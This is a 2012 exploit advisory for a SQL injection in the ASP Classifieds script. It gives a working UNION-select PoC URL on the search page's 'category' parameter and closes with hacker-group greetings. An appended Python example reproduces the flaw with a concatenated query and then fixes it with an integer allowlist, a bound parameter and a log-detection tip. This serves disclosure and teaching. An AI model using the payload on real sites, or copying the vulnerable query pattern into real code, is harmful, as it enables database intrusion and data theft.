# Exploit Title: ASP Classifieds Sql Injection
# Date: 17/03/2012
# Author: r45c4l
# Email: infosecpirate@gmail.com
# Script url: http://preproject.com/pclasp/home/default.asp
# Version: N/A
# CVE : ()

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

Product Description :

ASP Classifieds is one of the most customizable classified ad programs
that exist for ASP and Access. Unlimited images, unlimited categories
and much, much more make it perfect for anyone from those who want to set up
a used stamps classifieds to those wanting to show and sell real estate.

Product Cost : 58$

=======================Exploit====================================
---ICW---

[ EXPL0!T ]

SQL Injection
p0c -
http://SERVER/classi/search.php?category=[SQli]

PoC -

http://SERVER/classi/search.php?category=-1+union+all+select+version()--

[Note: Tested on demo website]

d0rk - use your brain ;)

===========================================================================
Greetz to : Beenu Arora, Godwin Austin, Eberly, b0nd, the_empty_, micr0,
Hoody, sam

All members of ICW, AH and darkc0de, and all Indian Hackers

Special Greetz to : b4ltazar and s1nner_01

=== End () ====
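
Added example (not part of the original advisory and not the vendor's code): why the `category` value in the PoC above reaches the SQL parser, and how an integer allowlist plus a bound parameter closes it. The table layout, the function names and the concatenated query shape are assumptions, and SQLite stands in for the product's database, so `version()` becomes `sqlite_version()`.

```python
import sqlite3

def make_db():
    # Constructed sample data standing in for the classifieds database.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE ads (id INTEGER PRIMARY KEY, category INTEGER, title TEXT);
        INSERT INTO ads (category, title)
        VALUES (1, 'Used stamps'), (2, 'Flat for sale');
    """)
    return db

def search_vulnerable(db, category):
    # Assumed shape of the flaw: the request value is concatenated into the SQL text.
    sql = "SELECT title FROM ads WHERE category = " + category
    return [row[0] for row in db.execute(sql)]

def parse_category(raw):
    # Allowlist: a category id is a short unsigned decimal integer, nothing else.
    if not (raw.isascii() and raw.isdigit() and len(raw) <= 9):
        raise ValueError("category must be a numeric id")
    return int(raw)

def search_hardened(db, category):
    # Validate first, then pass the value as a bound parameter, never as SQL text.
    cat_id = parse_category(category)
    cur = db.execute("SELECT title FROM ads WHERE category = ?", (cat_id,))
    return [row[0] for row in cur]

def is_rejected(db, category):
    # True when the hardened path refuses the value before any query runs.
    try:
        search_hardened(db, category)
        return False
    except ValueError:
        return True

# The advisory's PoC value, URL-decoded ('+' is a space), adapted for SQLite.
POC = "-1 union all select sqlite_version()--"

if __name__ == "__main__":
    db = make_db()
    print(search_vulnerable(db, "1"))   # normal lookup
    print(search_vulnerable(db, POC))   # UNION row carries the engine version
    print(search_hardened(db, "1"))     # same lookup through the hardened path
    print(is_rejected(db, POC))         # PoC value never reaches the database
```

Requests whose `category` fails `parse_category` are also a cheap detection signal in web server logs, since legitimate traffic only sends numeric ids.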